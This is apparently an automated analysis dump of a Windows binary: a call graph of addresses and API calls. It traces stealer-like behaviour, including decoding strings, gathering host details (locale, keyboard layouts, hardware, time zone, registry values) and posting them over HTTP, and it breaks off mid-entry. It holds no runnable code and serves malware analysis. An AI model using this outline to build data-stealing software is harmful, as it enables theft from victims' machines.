58124->58125 58126 3001663 58125->58126 58127 3015510 58126->58127 58128 3015521 58127->58128 58129 301a820 2 API calls 58128->58129 58130 301552e 58129->58130 58131 301a820 2 API calls 58130->58131 58132 301553b 58131->58132 58133 301a820 2 API calls 58132->58133 58134 3015548 58133->58134 58135 301a740 lstrcpy 58134->58135 58136 3015555 58135->58136 58137 301a740 lstrcpy 58136->58137 58138 3015562 58137->58138 58139 301a740 lstrcpy 58138->58139 58140 301556f 58139->58140 58141 301a740 lstrcpy 58140->58141 58181 301557c 58141->58181 58142 3015643 StrCmpCA 58142->58181 58143 30156a0 StrCmpCA 58144 30157dc 58143->58144 58143->58181 58145 301a8a0 lstrcpy 58144->58145 58146 30157e8 58145->58146 58147 301a820 2 API calls 58146->58147 58149 30157f6 58147->58149 58148 301a820 lstrlen lstrcpy 58148->58181 58151 301a820 2 API calls 58149->58151 58150 3015856 StrCmpCA 58152 3015991 58150->58152 58150->58181 58156 3015805 58151->58156 58155 301a8a0 lstrcpy 58152->58155 58153 301a740 lstrcpy 58153->58181 58154 301a7a0 lstrcpy 58154->58181 58157 301599d 58155->58157 58158 3001670 lstrcpy 58156->58158 58160 301a820 2 API calls 58157->58160 58179 3015811 58158->58179 58159 3001590 lstrcpy 58159->58181 58161 30159ab 58160->58161 58164 301a820 2 API calls 58161->58164 58162 3015a0b StrCmpCA 58165 3015a16 Sleep 58162->58165 58166 3015a28 58162->58166 58163 30151f0 23 API calls 58163->58181 58167 30159ba 58164->58167 58165->58181 58168 301a8a0 lstrcpy 58166->58168 58169 3001670 lstrcpy 58167->58169 58170 3015a34 58168->58170 58169->58179 58171 301a820 2 API calls 58170->58171 58172 3015a43 58171->58172 58174 301a820 2 API calls 58172->58174 58173 30152c0 29 API calls 58173->58181 58176 3015a52 58174->58176 58175 301578a StrCmpCA 58175->58181 58178 3001670 lstrcpy 58176->58178 58177 301a8a0 lstrcpy 58177->58181 58178->58179 58179->57234 58180 301593f StrCmpCA 58180->58181 58181->58142 58181->58143 58181->58148 58181->58150 58181->58153 58181->58154 58181->58159 58181->58162 58181->58163 58181->58173 58181->58175 58181->58177 58181->58180 58183 3017553 GetVolumeInformationA 58182->58183 58184 301754c 58182->58184 58185 3017591 58183->58185 58184->58183 58186 30175fc GetProcessHeap RtlAllocateHeap 58185->58186 58187 3017619 58186->58187 58188 3017628 wsprintfA 58186->58188 58190 301a740 lstrcpy 58187->58190 58189 301a740 lstrcpy 58188->58189 58191 3015da7 58189->58191 58190->58191 58191->57255 58193 301a7a0 lstrcpy 58192->58193 58194 3004899 58193->58194 59195 30047b0 58194->59195 58196 30048a5 58197 301a740 lstrcpy 58196->58197 58198 30048d7 58197->58198 58199 301a740 lstrcpy 58198->58199 58200 30048e4 58199->58200 58201 301a740 lstrcpy 58200->58201 58202 30048f1 58201->58202 58203 301a740 lstrcpy 58202->58203 58204 30048fe 58203->58204 58205 301a740 lstrcpy 58204->58205 58206 300490b InternetOpenA StrCmpCA 58205->58206 58207 3004944 58206->58207 58208 3004955 58207->58208 58209 3004ecb InternetCloseHandle 58207->58209 59208 3018b60 58208->59208 58211 3004ee8 58209->58211 59203 3009ac0 CryptStringToBinaryA 58211->59203 58212 3004963 59216 301a920 58212->59216 58215 3004976 58217 301a8a0 lstrcpy 58215->58217 58222 300497f 58217->58222 58218 301a820 2 API calls 58219 3004f05 58218->58219 58220 301a9b0 4 API calls 58219->58220 58223 3004f1b 58220->58223 58221 3004f27 codecvt 58225 301a7a0 lstrcpy 58221->58225 58226 301a9b0 4 API calls 58222->58226 58224 301a8a0 lstrcpy 58223->58224 58224->58221 58238 3004f57 58225->58238 58227 30049a9 58226->58227 58228 301a8a0 lstrcpy 58227->58228 58229 30049b2 58228->58229 58230 301a9b0 4 API calls 58229->58230 58231 30049d1 58230->58231 58232 301a8a0 lstrcpy 58231->58232 58233 30049da 58232->58233 58234 301a920 3 API calls 58233->58234 58235 30049f8 58234->58235 58236 301a8a0 lstrcpy 58235->58236 58237 3004a01 58236->58237 58239 301a9b0 4 API calls 58237->58239 58238->57258 58240 3004a20 58239->58240 58241 301a8a0 lstrcpy 58240->58241 58242 3004a29 58241->58242 58243 301a9b0 4 API calls 58242->58243 58244 3004a48 58243->58244 58245 301a8a0 lstrcpy 58244->58245 58246 3004a51 58245->58246 58247 301a9b0 4 API calls 58246->58247 58248 3004a7d 58247->58248 58249 301a920 3 API calls 58248->58249 58250 3004a84 58249->58250 58251 301a8a0 lstrcpy 58250->58251 58252 3004a8d 58251->58252 58253 3004aa3 InternetConnectA 58252->58253 58253->58209 58254 3004ad3 HttpOpenRequestA 58253->58254 58256 3004b28 58254->58256 58257 3004ebe InternetCloseHandle 58254->58257 58258 301a9b0 4 API calls 58256->58258 58257->58209 58259 3004b3c 58258->58259 58260 301a8a0 lstrcpy 58259->58260 58261 3004b45 58260->58261 58262 301a920 3 API calls 58261->58262 58263 3004b63 58262->58263 58264 301a8a0 lstrcpy 58263->58264 58265 3004b6c 58264->58265 58266 301a9b0 4 API calls 58265->58266 58267 3004b8b 58266->58267 58268 301a8a0 lstrcpy 58267->58268 58269 3004b94 58268->58269 58270 301a9b0 4 API calls 58269->58270 58271 3004bb5 58270->58271 58272 301a8a0 lstrcpy 58271->58272 58273 3004bbe 58272->58273 58274 301a9b0 4 API calls 58273->58274 58275 3004bde 58274->58275 58276 301a8a0 lstrcpy 58275->58276 58277 3004be7 58276->58277 58278 301a9b0 4 API calls 58277->58278 58279 3004c06 58278->58279 58280 301a8a0 lstrcpy 58279->58280 58281 3004c0f 58280->58281 58282 301a920 3 API calls 58281->58282 58283 3004c2d 58282->58283 58284 301a8a0 lstrcpy 58283->58284 58285 3004c36 58284->58285 58286 301a9b0 4 API calls 58285->58286 58287 3004c55 58286->58287 58288 301a8a0 lstrcpy 58287->58288 58289 3004c5e 58288->58289 58290 301a9b0 4 API calls 58289->58290 58291 3004c7d 58290->58291 58292 301a8a0 lstrcpy 58291->58292 58293 3004c86 58292->58293 58294 301a920 3 API calls 58293->58294 58295 3004ca4 58294->58295 58296 301a8a0 lstrcpy 58295->58296 58297 3004cad 58296->58297 58298 301a9b0 4 API calls 58297->58298 58299 3004ccc 58298->58299 58300 301a8a0 lstrcpy 58299->58300 58301 3004cd5 58300->58301 58302 301a9b0 4 API calls 58301->58302 58303 3004cf6 58302->58303 58304 301a8a0 lstrcpy 58303->58304 58305 3004cff 58304->58305 58306 301a9b0 4 API calls 58305->58306 58307 3004d1f 58306->58307 58308 301a8a0 lstrcpy 58307->58308 58309 3004d28 58308->58309 58310 301a9b0 4 API calls 58309->58310 58311 3004d47 58310->58311 58312 301a8a0 lstrcpy 58311->58312 58313 3004d50 58312->58313 58314 301a920 3 API calls 58313->58314 58315 3004d6e 58314->58315 58316 301a8a0 lstrcpy 58315->58316 58317 3004d77 58316->58317 58318 301a740 lstrcpy 58317->58318 58319 3004d92 58318->58319 58320 301a920 3 API calls 58319->58320 58321 3004db3 58320->58321 58322 301a920 3 API calls 58321->58322 58323 3004dba 58322->58323 58324 301a8a0 lstrcpy 58323->58324 58325 3004dc6 58324->58325 58326 3004de7 lstrlen 58325->58326 58327 3004dfa 58326->58327 58328 3004e03 lstrlen 58327->58328 59222 301aad0 58328->59222 58330 3004e13 HttpSendRequestA 58331 3004e32 InternetReadFile 58330->58331 58332 3004e67 InternetCloseHandle 58331->58332 58337 3004e5e 58331->58337 58335 301a800 58332->58335 58334 301a9b0 4 API calls 58334->58337 58335->58257 58336 301a8a0 lstrcpy 58336->58337 58337->58331 58337->58332 58337->58334 58337->58336 59227 301aad0 58338->59227 58340 30117c4 StrCmpCA 58341 30117d7 58340->58341 58342 30117cf ExitProcess 58340->58342 58343 30117e7 strtok_s 58341->58343 58346 30117f4 58343->58346 58344 30119c2 58344->57260 58345 301199e strtok_s 58345->58346 58346->58344 58346->58345 58347 30118ad StrCmpCA 58346->58347 58348 30118cf StrCmpCA 58346->58348 58349 30118f1 StrCmpCA 58346->58349 58350 3011951 StrCmpCA 58346->58350 58351 3011970 StrCmpCA 58346->58351 58352 3011913 StrCmpCA 58346->58352 58353 3011932 StrCmpCA 58346->58353 58354 301185d StrCmpCA 58346->58354 58355 301187f StrCmpCA 58346->58355 58356 301a820 lstrlen lstrcpy 58346->58356 58357 301a820 2 API calls 58346->58357 58347->58346 58348->58346 58349->58346 58350->58346 58351->58346 58352->58346 58353->58346 58354->58346 58355->58346 58356->58346 58357->58345 58359 301a7a0 lstrcpy 58358->58359 58360 3005979 58359->58360 58361 30047b0 5 API calls 58360->58361 58362 3005985 58361->58362 58363 301a740 lstrcpy 58362->58363 58364 30059ba 58363->58364 58365 301a740 lstrcpy 58364->58365 58366 30059c7 58365->58366 58367 301a740 lstrcpy 58366->58367 58368 30059d4 58367->58368 58369 301a740 lstrcpy 58368->58369 58370 30059e1 58369->58370 58371 301a740 lstrcpy 58370->58371 58372 30059ee InternetOpenA StrCmpCA 58371->58372 58373 3005a1d 58372->58373 58374 3005fc3 InternetCloseHandle 58373->58374 58376 3018b60 3 API calls 58373->58376 58375 3005fe0 58374->58375 58378 3009ac0 4 API calls 58375->58378 58377 3005a3c 58376->58377 58379 301a920 3 API calls 58377->58379 58380 3005fe6 58378->58380 58381 3005a4f 58379->58381 58383 301a820 2 API calls 58380->58383 58386 300601f codecvt 58380->58386 58382 301a8a0 lstrcpy 58381->58382 58388 3005a58 58382->58388 58384 3005ffd 58383->58384 58385 301a9b0 4 API calls 58384->58385 58387 3006013 58385->58387 58390 301a7a0 lstrcpy 58386->58390 58389 301a8a0 lstrcpy 58387->58389 58391 301a9b0 4 API calls 58388->58391 58389->58386 58400 300604f 58390->58400 58392 3005a82 58391->58392 58393 301a8a0 lstrcpy 58392->58393 58394 3005a8b 58393->58394 58395 301a9b0 4 API calls 58394->58395 58396 3005aaa 58395->58396 58397 301a8a0 lstrcpy 58396->58397 58398 3005ab3 58397->58398 58399 301a920 3 API calls 58398->58399 58401 3005ad1 58399->58401 58400->57266 58402 301a8a0 lstrcpy 58401->58402 58403 3005ada 58402->58403 58404 301a9b0 4 API calls 58403->58404 58405 3005af9 58404->58405 58406 301a8a0 lstrcpy 58405->58406 58407 3005b02 58406->58407 58408 301a9b0 4 API calls 58407->58408 58409 3005b21 58408->58409 58410 301a8a0 lstrcpy 58409->58410 58411 3005b2a 58410->58411 58412 301a9b0 4 API calls 58411->58412 58413 3005b56 58412->58413 58414 301a920 3 API calls 58413->58414 58415 3005b5d 58414->58415 58416 301a8a0 lstrcpy 58415->58416 58417 3005b66 58416->58417 58418 3005b7c InternetConnectA 58417->58418 58418->58374 58419 3005bac HttpOpenRequestA 58418->58419 58421 3005fb6 InternetCloseHandle 58419->58421 58422 3005c0b 58419->58422 58421->58374 58423 301a9b0 4 API calls 58422->58423 58424 3005c1f 58423->58424 58425 301a8a0 lstrcpy 58424->58425 58426 3005c28 58425->58426 58427 301a920 3 API calls 58426->58427 58428 3005c46 58427->58428 58429 301a8a0 lstrcpy 58428->58429 58430 3005c4f 58429->58430 58431 301a9b0 4 API calls 58430->58431 58432 3005c6e 58431->58432 58433 301a8a0 lstrcpy 58432->58433 58434 3005c77 58433->58434 58435 301a9b0 4 API calls 58434->58435 58436 3005c98 58435->58436 58437 301a8a0 lstrcpy 58436->58437 58438 3005ca1 58437->58438 58439 301a9b0 4 API calls 58438->58439 58440 3005cc1 58439->58440 58441 301a8a0 lstrcpy 58440->58441 58442 3005cca 58441->58442 58443 301a9b0 4 API calls 58442->58443 58444 3005ce9 58443->58444 58445 301a8a0 lstrcpy 58444->58445 58446 3005cf2 58445->58446 58447 301a920 3 API calls 58446->58447 58448 3005d10 58447->58448 58449 301a8a0 lstrcpy 58448->58449 58450 3005d19 58449->58450 58451 301a9b0 4 API calls 58450->58451 58452 3005d38 58451->58452 58453 301a8a0 lstrcpy 58452->58453 58454 3005d41 58453->58454 58455 301a9b0 4 API calls 58454->58455 58456 3005d60 58455->58456 58457 301a8a0 lstrcpy 58456->58457 58458 3005d69 58457->58458 58459 301a920 3 API calls 58458->58459 58460 3005d87 58459->58460 58461 301a8a0 lstrcpy 58460->58461 58462 3005d90 58461->58462 58463 301a9b0 4 API calls 58462->58463 58464 3005daf 58463->58464 58465 301a8a0 lstrcpy 58464->58465 58466 3005db8 58465->58466 58467 301a9b0 4 API calls 58466->58467 58468 3005dd9 58467->58468 58469 301a8a0 lstrcpy 58468->58469 58470 3005de2 58469->58470 58471 301a9b0 4 API calls 58470->58471 58472 3005e02 58471->58472 58473 301a8a0 lstrcpy 58472->58473 58474 3005e0b 58473->58474 58475 301a9b0 4 API calls 58474->58475 58476 3005e2a 58475->58476 58477 301a8a0 lstrcpy 58476->58477 58478 3005e33 58477->58478 58479 301a920 3 API calls 58478->58479 58480 3005e54 58479->58480 58481 301a8a0 lstrcpy 58480->58481 58482 3005e5d 58481->58482 58483 3005e70 lstrlen 58482->58483 59228 301aad0 58483->59228 58485 3005e81 lstrlen GetProcessHeap RtlAllocateHeap 59229 301aad0 58485->59229 58487 3005eae lstrlen 59230 301aad0 58487->59230 58489 3005ebe memcpy 59231 301aad0 58489->59231 58491 3005ed7 lstrlen 58492 3005ee7 58491->58492 58493 3005ef0 lstrlen memcpy 58492->58493 59232 301aad0 58493->59232 58495 3005f1a lstrlen 59233 301aad0 58495->59233 58497 3005f2a HttpSendRequestA 58498 3005f35 InternetReadFile 58497->58498 58499 3005f6a InternetCloseHandle 58498->58499 58503 3005f61 58498->58503 58499->58421 58501 301a9b0 4 API calls 58501->58503 58502 301a8a0 lstrcpy 58502->58503 58503->58498 58503->58499 58503->58501 58503->58502 59234 301aad0 58504->59234 58506 3011077 strtok_s 58510 3011084 58506->58510 58507 3011151 58507->57268 58508 301112d strtok_s 58508->58510 58509 301a820 lstrlen lstrcpy 58509->58510 58510->58507 58510->58508 58510->58509 59235 301aad0 58511->59235 58513 3010db7 strtok_s 58520 3010dc4 58513->58520 58514 3010ef3 strtok_s 58514->58520 58515 3010ea4 StrCmpCA 58515->58520 58516 3010e27 StrCmpCA 58516->58520 58517 3010e67 StrCmpCA 58517->58520 58518 3010f17 58518->57276 58519 301a820 lstrlen lstrcpy 58519->58520 58520->58514 58520->58515 58520->58516 58520->58517 58520->58518 58520->58519 59236 301aad0 58521->59236 58523 3010f67 strtok_s 58525 3010f74 58523->58525 58524 3011044 58524->57284 58525->58524 58526 3010fb2 StrCmpCA 58525->58526 58527 301a820 lstrlen lstrcpy 58525->58527 58528 3011020 strtok_s 58525->58528 58526->58525 58527->58525 58528->58525 58530 301a740 lstrcpy 58529->58530 58531 3011a26 58530->58531 58532 301a9b0 4 API calls 58531->58532 58533 3011a37 58532->58533 58534 301a8a0 lstrcpy 58533->58534 58535 3011a40 58534->58535 58536 301a9b0 4 API calls 58535->58536 58537 3011a5b 58536->58537 58538 301a8a0 lstrcpy 58537->58538 58539 3011a64 58538->58539 58540 301a9b0 4 API calls 58539->58540 58541 3011a7d 58540->58541 58542 301a8a0 lstrcpy 58541->58542 58543 3011a86 58542->58543 58544 301a9b0 4 API calls 58543->58544 58545 3011aa1 58544->58545 58546 301a8a0 lstrcpy 58545->58546 58547 3011aaa 58546->58547 58548 301a9b0 4 API calls 58547->58548 58549 3011ac3 58548->58549 58550 301a8a0 lstrcpy 58549->58550 58551 3011acc 58550->58551 58552 301a9b0 4 API calls 58551->58552 58553 3011ae7 58552->58553 58554 301a8a0 lstrcpy 58553->58554 58555 3011af0 58554->58555 58556 301a9b0 4 API calls 58555->58556 58557 3011b09 58556->58557 58558 301a8a0 lstrcpy 58557->58558 58559 3011b12 58558->58559 58560 301a9b0 4 API calls 58559->58560 58561 3011b2d 58560->58561 58562 301a8a0 lstrcpy 58561->58562 58563 3011b36 58562->58563 58564 301a9b0 4 API calls 58563->58564 58565 3011b4f 58564->58565 58566 301a8a0 lstrcpy 58565->58566 58567 3011b58 58566->58567 58568 301a9b0 4 API calls 58567->58568 58569 3011b76 58568->58569 58570 301a8a0 lstrcpy 58569->58570 58571 3011b7f 58570->58571 58572 3017500 6 API calls 58571->58572 58573 3011b96 58572->58573 58574 301a920 3 API calls 58573->58574 58575 3011ba9 58574->58575 58576 301a8a0 lstrcpy 58575->58576 58577 3011bb2 58576->58577 58578 301a9b0 4 API calls 58577->58578 58579 3011bdc 58578->58579 58580 301a8a0 lstrcpy 58579->58580 58581 3011be5 58580->58581 58582 301a9b0 4 API calls 58581->58582 58583 3011c05 58582->58583 58584 301a8a0 lstrcpy 58583->58584 58585 3011c0e 58584->58585 59237 3017690 GetProcessHeap RtlAllocateHeap 58585->59237 58588 301a9b0 4 API calls 58589 3011c2e 58588->58589 58590 301a8a0 lstrcpy 58589->58590 58591 3011c37 58590->58591 58592 301a9b0 4 API calls 58591->58592 58593 3011c56 58592->58593 58594 301a8a0 lstrcpy 58593->58594 58595 3011c5f 58594->58595 58596 301a9b0 4 API calls 58595->58596 58597 3011c80 58596->58597 58598 301a8a0 lstrcpy 58597->58598 58599 3011c89 58598->58599 59244 30177c0 GetCurrentProcess IsWow64Process 58599->59244 58602 301a9b0 4 API calls 58603 3011ca9 58602->58603 58604 301a8a0 lstrcpy 58603->58604 58605 3011cb2 58604->58605 58606 301a9b0 4 API calls 58605->58606 58607 3011cd1 58606->58607 58608 301a8a0 lstrcpy 58607->58608 58609 3011cda 58608->58609 58610 301a9b0 4 API calls 58609->58610 58611 3011cfb 58610->58611 58612 301a8a0 lstrcpy 58611->58612 58613 3011d04 58612->58613 58614 3017850 3 API calls 58613->58614 58615 3011d14 58614->58615 58616 301a9b0 4 API calls 58615->58616 58617 3011d24 58616->58617 58618 301a8a0 lstrcpy 58617->58618 58619 3011d2d 58618->58619 58620 301a9b0 4 API calls 58619->58620 58621 3011d4c 58620->58621 58622 301a8a0 lstrcpy 58621->58622 58623 3011d55 58622->58623 58624 301a9b0 4 API calls 58623->58624 58625 3011d75 58624->58625 58626 301a8a0 lstrcpy 58625->58626 58627 3011d7e 58626->58627 58628 30178e0 3 API calls 58627->58628 58629 3011d8e 58628->58629 58630 301a9b0 4 API calls 58629->58630 58631 3011d9e 58630->58631 58632 301a8a0 lstrcpy 58631->58632 58633 3011da7 58632->58633 58634 301a9b0 4 API calls 58633->58634 58635 3011dc6 58634->58635 58636 301a8a0 lstrcpy 58635->58636 58637 3011dcf 58636->58637 58638 301a9b0 4 API calls 58637->58638 58639 3011df0 58638->58639 58640 301a8a0 lstrcpy 58639->58640 58641 3011df9 58640->58641 59246 3017980 GetProcessHeap RtlAllocateHeap GetLocalTime wsprintfA 58641->59246 58644 301a9b0 4 API calls 58645 3011e19 58644->58645 58646 301a8a0 lstrcpy 58645->58646 58647 3011e22 58646->58647 58648 301a9b0 4 API calls 58647->58648 58649 3011e41 58648->58649 58650 301a8a0 lstrcpy 58649->58650 58651 3011e4a 58650->58651 58652 301a9b0 4 API calls 58651->58652 58653 3011e6b 58652->58653 58654 301a8a0 lstrcpy 58653->58654 58655 3011e74 58654->58655 59248 3017a30 GetProcessHeap RtlAllocateHeap GetTimeZoneInformation 58655->59248 58658 301a9b0 4 API calls 58659 3011e94 58658->58659 58660 301a8a0 lstrcpy 58659->58660 58661 3011e9d 58660->58661 58662 301a9b0 4 API calls 58661->58662 58663 3011ebc 58662->58663 58664 301a8a0 lstrcpy 58663->58664 58665 3011ec5 58664->58665 58666 301a9b0 4 API calls 58665->58666 58667 3011ee5 58666->58667 58668 301a8a0 lstrcpy 58667->58668 58669 3011eee 58668->58669 59251 3017b00 GetUserDefaultLocaleName 58669->59251 58672 301a9b0 4 API calls 58673 3011f0e 58672->58673 58674 301a8a0 lstrcpy 58673->58674 58675 3011f17 58674->58675 58676 301a9b0 4 API calls 58675->58676 58677 3011f36 58676->58677 58678 301a8a0 lstrcpy 58677->58678 58679 3011f3f 58678->58679 58680 301a9b0 4 API calls 58679->58680 58681 3011f60 58680->58681 58682 301a8a0 lstrcpy 58681->58682 58683 3011f69 58682->58683 59256 3017b90 58683->59256 58685 3011f80 58686 301a920 3 API calls 58685->58686 58687 3011f93 58686->58687 58688 301a8a0 lstrcpy 58687->58688 58689 3011f9c 58688->58689 58690 301a9b0 4 API calls 58689->58690 58691 3011fc6 58690->58691 58692 301a8a0 lstrcpy 58691->58692 58693 3011fcf 58692->58693 58694 301a9b0 4 API calls 58693->58694 58695 3011fef 58694->58695 58696 301a8a0 lstrcpy 58695->58696 58697 3011ff8 58696->58697 59268 3017d80 GetSystemPowerStatus 58697->59268 58700 301a9b0 4 API calls 58701 3012018 58700->58701 58702 301a8a0 lstrcpy 58701->58702 58703 3012021 58702->58703 58704 301a9b0 4 API calls 58703->58704 58705 3012040 58704->58705 58706 301a8a0 lstrcpy 58705->58706 58707 3012049 58706->58707 58708 301a9b0 4 API calls 58707->58708 58709 301206a 58708->58709 58710 301a8a0 lstrcpy 58709->58710 58711 3012073 58710->58711 58712 301207e GetCurrentProcessId 58711->58712 59270 3019470 OpenProcess 58712->59270 58715 301a920 3 API calls 58716 30120a4 58715->58716 58717 301a8a0 lstrcpy 58716->58717 58718 30120ad 58717->58718 58719 301a9b0 4 API calls 58718->58719 58720 30120d7 58719->58720 58721 301a8a0 lstrcpy 58720->58721 58722 30120e0 58721->58722 58723 301a9b0 4 API calls 58722->58723 58724 3012100 58723->58724 58725 301a8a0 lstrcpy 58724->58725 58726 3012109 58725->58726 59275 3017e00 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 58726->59275 58729 301a9b0 4 API calls 58730 3012129 58729->58730 58731 301a8a0 lstrcpy 58730->58731 58732 3012132 58731->58732 58733 301a9b0 4 API calls 58732->58733 58734 3012151 58733->58734 58735 301a8a0 lstrcpy 58734->58735 58736 301215a 58735->58736 58737 301a9b0 4 API calls 58736->58737 58738 301217b 58737->58738 58739 301a8a0 lstrcpy 58738->58739 58740 3012184 58739->58740 59279 3017f60 58740->59279 58743 301a9b0 4 API calls 58744 30121a4 58743->58744 58745 301a8a0 lstrcpy 58744->58745 58746 30121ad 58745->58746 58747 301a9b0 4 API calls 58746->58747 58748 30121cc 58747->58748 58749 301a8a0 lstrcpy 58748->58749 58750 30121d5 58749->58750 58751 301a9b0 4 API calls 58750->58751 58752 30121f6 58751->58752 58753 301a8a0 lstrcpy 58752->58753 58754 30121ff 58753->58754 59292 3017ed0 GetSystemInfo wsprintfA 58754->59292 58757 301a9b0 4 API calls 58758 301221f 58757->58758 58759 301a8a0 lstrcpy 58758->58759 58760 3012228 58759->58760 58761 301a9b0 4 API calls 58760->58761 58762 3012247 58761->58762 58763 301a8a0 lstrcpy 58762->58763 58764 3012250 58763->58764 58765 301a9b0 4 API calls 58764->58765 58766 3012270 58765->58766 58767 301a8a0 lstrcpy 58766->58767 58768 3012279 58767->58768 59294 3018100 GetProcessHeap RtlAllocateHeap 58768->59294 58771 301a9b0 4 API calls 58772 3012299 58771->58772 58773 301a8a0 lstrcpy 58772->58773 58774 30122a2 58773->58774 58775 301a9b0 4 API calls 58774->58775 58776 30122c1 58775->58776 58777 301a8a0 lstrcpy 58776->58777 58778 30122ca 58777->58778 58779 301a9b0 4 API calls 58778->58779 58780 30122eb 58779->58780 58781 301a8a0 lstrcpy 58780->58781 58782 30122f4 58781->58782 59300 30187c0 7 API calls 58782->59300 58785 301a920 3 API calls 58786 301231e 58785->58786 58787 301a8a0 lstrcpy 58786->58787 58788 3012327 58787->58788 58789 301a9b0 4 API calls 58788->58789 58790 3012351 58789->58790 58791 301a8a0 lstrcpy 58790->58791 58792 301235a 58791->58792 58793 301a9b0 4 API calls 58792->58793 58794 301237a 58793->58794 58795 301a8a0 lstrcpy 58794->58795 58796 3012383 58795->58796 58797 301a9b0 4 API calls 58796->58797 58798 30123a2 58797->58798 58799 301a8a0 lstrcpy 58798->58799 58800 30123ab 58799->58800 59303 30181f0 58800->59303 58802 30123c2 58803 301a920 3 API calls 58802->58803 58804 30123d5 58803->58804 58805 301a8a0 lstrcpy 58804->58805 58806 30123de 58805->58806 58807 301a9b0 4 API calls 58806->58807 58808 301240a 58807->58808 58809 301a8a0 lstrcpy 58808->58809 58810 3012413 58809->58810 58811 301a9b0 4 API calls 58810->58811 58812 3012432 58811->58812 58813 301a8a0 lstrcpy 58812->58813 58814 301243b 58813->58814 58815 301a9b0 4 API calls 58814->58815 58816 301245c 58815->58816 58817 301a8a0 lstrcpy 58816->58817 58818 3012465 58817->58818 58819 301a9b0 4 API calls 58818->58819 58820 3012484 58819->58820 58821 301a8a0 lstrcpy 58820->58821 58822 301248d 58821->58822 58823 301a9b0 4 API calls 58822->58823 58824 30124ae 58823->58824 58825 301a8a0 lstrcpy 58824->58825 58826 30124b7 58825->58826 59312 3018320 58826->59312 58828 30124d3 58829 301a920 3 API calls 58828->58829 58830 30124e6 58829->58830 58831 301a8a0 lstrcpy 58830->58831 58832 30124ef 58831->58832 58833 301a9b0 4 API calls 58832->58833 58834 3012519 58833->58834 58835 301a8a0 lstrcpy 58834->58835 58836 3012522 58835->58836 58837 301a9b0 4 API calls 58836->58837 58838 3012543 58837->58838 58839 301a8a0 lstrcpy 58838->58839 58840 301254c 58839->58840 58841 3018320 17 API calls 58840->58841 58842 3012568 58841->58842 58843 301a920 3 API calls 58842->58843 58844 301257b 58843->58844 58845 301a8a0 lstrcpy 58844->58845 58846 3012584 58845->58846 58847 301a9b0 4 API calls 58846->58847 58848 30125ae 58847->58848 58849 301a8a0 lstrcpy 58848->58849 58850 30125b7 58849->58850 58851 301a9b0 4 API calls 58850->58851 58852 30125d6 58851->58852 58853 301a8a0 lstrcpy 58852->58853 58854 30125df 58853->58854 58855 301a9b0 4 API calls 58854->58855 58856 3012600 58855->58856 58857 301a8a0 lstrcpy 58856->58857 58858 3012609 58857->58858 59348 3018680 58858->59348 58860 3012620 58861 301a920 3 API calls 58860->58861 58862 3012633 58861->58862 58863 301a8a0 lstrcpy 58862->58863 58864 301263c 58863->58864 58865 301265a lstrlen 58864->58865 58866 301266a 58865->58866 58867 301a740 lstrcpy 58866->58867 58868 301267c 58867->58868 58869 3001590 lstrcpy 58868->58869 58870 301268d 58869->58870 59358 3015190 58870->59358 58872 3012699 58872->57288 59187 301a7a0 lstrcpy 59186->59187 59188 3001683 59187->59188 59189 301a7a0 lstrcpy 59188->59189 59190 3001695 59189->59190 59191 301a7a0 lstrcpy 59190->59191 59192 30016a7 59191->59192 59193 301a7a0 lstrcpy 59192->59193 59194 30015a3 59193->59194 59194->58119 59223 3001030 59195->59223 59199 3004838 lstrlen 59226 301aad0 59199->59226 59201 3004848 InternetCrackUrlA 59202 3004867 59201->59202 59202->58196 59204 3009af9 LocalAlloc 59203->59204 59205 3004eee 59203->59205 59204->59205 59206 3009b14 CryptStringToBinaryA 59204->59206 59205->58218 59205->58221 59206->59205 59207 3009b39 LocalFree 59206->59207 59207->59205 59209 301a740 lstrcpy 59208->59209 59210 3018b74 59209->59210 59211 301a740 lstrcpy 59210->59211 59212 3018b82 GetSystemTime 59211->59212 59214 3018b99 59212->59214 59213 301a7a0 lstrcpy 59215 3018bfc 59213->59215 59214->59213 59215->58212 59217 301a931 59216->59217 59218 301a988 59217->59218 59220 301a968 lstrcpy lstrcat 59217->59220 59219 301a7a0 lstrcpy 59218->59219 59221 301a994 59219->59221 59220->59218 59221->58215 59222->58330 59224 300103a ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI 59223->59224 59225 301aad0 59224->59225 59225->59199 59226->59201 59227->58340 59228->58485 59229->58487 59230->58489 59231->58491 59232->58495 59233->58497 59234->58506 59235->58513 59236->58523 59365 30177a0 59237->59365 59240 30176c6 RegOpenKeyExA 59242 3017704 RegCloseKey 59240->59242 59243 30176e7 RegQueryValueExA 59240->59243 59241 3011c1e 59241->58588 59242->59241 59243->59242 59245 3011c99 59244->59245 59245->58602 59247 3011e09 59246->59247 59247->58644 59249 3017a9a wsprintfA 59248->59249 59250 3011e84 59248->59250 59249->59250 59250->58658 59252 3011efe 59251->59252 59253 3017b4d 59251->59253 59252->58672 59372 3018d20 LocalAlloc CharToOemW 59253->59372 59255 3017b59 59255->59252 59257 301a740 lstrcpy 59256->59257 59258 3017bcc GetKeyboardLayoutList LocalAlloc GetKeyboardLayoutList 59257->59258 59259 3017c25 59258->59259 59260 3017c46 GetLocaleInfoA 59259->59260 59261 3017d18 59259->59261 59265 301a8a0 lstrcpy 59259->59265 59266 301a9b0 lstrcpy lstrlen lstrcpy lstrcat 59259->59266 59260->59259 59262 3017d28 59261->59262 59263 3017d1e LocalFree 59261->59263 59264 301a7a0 lstrcpy 59262->59264 59263->59262 59267 3017d37 59264->59267 59265->59259 59266->59259 59267->58685 59269 3012008 59268->59269 59269->58700 59271 3019493 K32GetModuleFileNameExA CloseHandle 59270->59271 59272 30194b5 59270->59272 59271->59272 59273 301a740 lstrcpy 59272->59273 59274 3012091 59273->59274 59274->58715 59276 3012119 59275->59276 59277 3017e68 RegQueryValueExA 59275->59277 59276->58729 59278 3017e8e RegCloseKey 59277->59278 59278->59276 59280 3017fb9 GetLogicalProcessorInformationEx 59279->59280 59281 3017fd8 GetLastError 59280->59281 59288 3018029 59280->59288 59282 3018022 59281->59282 59291 3017fe3 59281->59291 59285 3012194 59282->59285 59376 30189f0 GetProcessHeap HeapFree 59282->59376 59285->58743 59375 30189f0 GetProcessHeap HeapFree 59288->59375 59289 301807b 59289->59282 59290 3018084 wsprintfA 59289->59290 59290->59285 59291->59280 59291->59285 59373 30189f0 GetProcessHeap HeapFree 59291->59373 59374 3018a10 GetProcessHeap RtlAllocateHeap 59291->59374 59293 301220f 59292->59293 59293->58757 59295 30189b0 59294->59295 59296 301814d GlobalMemoryStatusEx 59295->59296 59299 3018163 __aulldiv 59296->59299 59297 301819b wsprintfA 59298 